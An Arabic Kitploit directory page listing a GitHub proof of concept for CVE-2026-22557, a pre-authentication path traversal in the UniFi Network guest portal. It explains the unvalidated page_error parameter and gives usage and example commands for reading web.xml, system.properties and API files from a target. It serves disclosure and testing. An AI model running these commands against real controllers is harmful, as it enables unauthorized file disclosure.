Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22557-PoC — إثبات المفهوم (PoC) لثغرة اجتياز المسار قبل المصادقة في تطبيق شبكة UniFi (CVE-2026-22557) | Kitploit
أدوات/GitHubGitHub/thepotatoofdoom/cve-2026-22557-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubthepotatoofdoom/cve-2026-22557-poc

CVE-2026-22557-PoC

إثبات المفهوم (PoC) لثغرة اجتياز المسار قبل المصادقة في تطبيق شبكة UniFi (CVE-2026-22557)

عرض المستودع
43منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-22557 -- ثغرة اجتياز المسار قبل المصادقة في تطبيق UniFi Network

اجتياز مسار قبل المصادقة في بوابة الضيوف لتطبيق UniFi Network (/guest/s/{site}/login). يتم تمرير معامل الاستعلام page_error إلى محمّل موارد دون تحقق، مما يسمح لمهاجم غير مصادق بقراءة ملفات من تطبيق الويب (مثل WEB-INF/web.xml).

إذا تم تخصيص صفحة بوابة الضيوف، يبدو أن محمّل الموارد يتراجع إلى فرع FileInputStream خام يمكنه الوصول إلى ملفات عشوائية على النظام الأساسي خارج سياق الجذر. لم أؤكد ذلك بعد وسأواصل التحقيق إذا توفر لدي وقت.

الاستخدام

root@kitploit:~
pip install requests
python CVE-2026-22557.py <target_url> [-f FILE] [-g GUEST_PATH] [-o OUTPUT] [-x PROXY]
الخيارالوصفالافتراضي
targetعنوان الهدف (مثل https://host:8843)(مطلوب)
-fالمسار النسبي للقراءة../../web.xml
-gمسار بوابة الضيوف/guest/s/default/login
-oكتابة الاستجابة إلى ملف(الإخراج القياسي)
-xعنوان الوكيل(لا يوجد)

أمثلة

image
root@kitploit:~
# الافتراضي -- قراءة WEB-INF/web.xml (بوابة ضيوف HTTPS)
python CVE-2026-22557.py https://192.168.1.1:8843

# بوابة ضيوف HTTP
python CVE-2026-22557.py http://192.168.1.1:8880

# قراءة مورد مسار الفئات
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../system.properties

# قراءة مخطط API وحفظه في ملف
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../api/fields/Setting.json -o setting.json

# اسم موقع مختلف
python CVE-2026-22557.py https://192.168.1.1:8843 -g /guest/s/mysite/login

# عبر وكيل
python CVE-2026-22557.py https://192.168.1.1:8843 -x http://127.0.0.1:8080
تنزيل الأداة